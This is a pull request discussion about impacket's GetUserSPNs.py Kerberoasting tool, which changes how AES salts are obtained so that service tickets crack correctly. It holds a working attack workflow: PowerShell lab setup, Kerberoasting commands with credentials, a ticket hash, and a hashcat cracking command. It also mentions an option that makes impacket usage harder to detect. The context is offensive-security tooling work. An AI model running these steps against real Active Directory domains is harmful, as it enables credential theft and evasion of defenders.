Open niph opened 3 months ago
@niph can you specify the way on how to configure a target in order to test your PR ? Thanks
After some testing it seems that the problem is partially related to a direct change of the SamAccountName
attribute. In the environments we observed that the salt is wrong, most of the accounts were related to an appliance / software running on Unix.
To reproduce the behavior you can do the following:
Create a kerberoastable account
$PW = ConvertTo-SecureString "P@ssw0rd" -AsPlainText -Force
New-ADUser -AccountPassword $PW -SamAccountName the-salt -UserPrincipalName the-salt -Name the-salt -KerberosEncryptionType "AES128,AES256" -ServicePrincipalNames @('host/foo.bar') -Enabled $true
Change the SamAccountName
Set-ADUser -Identity the-salt -SamAccountName whatever
Kerberoast with the current impacket implementation. The salt will be set to the new SamAccountName whatever
GetUserSPNs.py fortra.local/niph:'NotP@ssw0rd' -request
...
$krb5tgs$18$whatever$FORTRA.LOCAL$*fortra.local/whatever*$2eac33c1eea848
echo 'P@ssw0rd' > wordlist
hashcat -w4 -O -m 19700 whatever.txt wordlist
GetUserSPNs.py
from this PR
GetUserSPNs.py fortra.local/niph:'NotP@ssw0rd' -request
$krb5tgs$18$the-salt$FORTRA.LOCAL$*fortra.local/whatever*$8c15b7c6f500cf.....:P@ssw0rd
I haven't figured out how you have to configure the account so that the hash is set to one of the ServicePrincipalNames of the account. However, testing in various environments showed that the salt does not necessarily have to be the SamAccountName and can be one of the ServicePrincipalNames
The current implementation of
GetUserSPNs.py
uses the username as the salt value for AES based tickets. Whilst this works in most cases we ran into quite a few scenarios within different environments where the hashes could not be cracked although the cleartext password was known. According to rfc4120 and our testing the actual salt value used for AES can be obtained from anAS-REQ
.We did not further look into under which exact conditions the salt value does not equal the
samAccountName
but according to our testing it rather common that the salt is either one of the SPNs or the UserPrincipalName configured on the target account.Thus, this PR changes the functionality to send an additional
AS_REQ
packet if the etype of the decoded TGS equalsaes256_cts_hmac_sha1_96
oraes128_cts_hmac_sha1_96
. It then extracts the salt value from theETYPE_INFO2_ENTRY
. Since AES cracking is rather expensive this is the new default behavior. In addition, the-no-preauthsalt
argument was implemented to fall back to the original logic before this PR. The command line flag can also be used to dechain theTGS_REQ
andAS_REQ
to make it harder to detect impacket usage based on network IoCs.Shout-out to my team member who brought up this issue but is not on social media.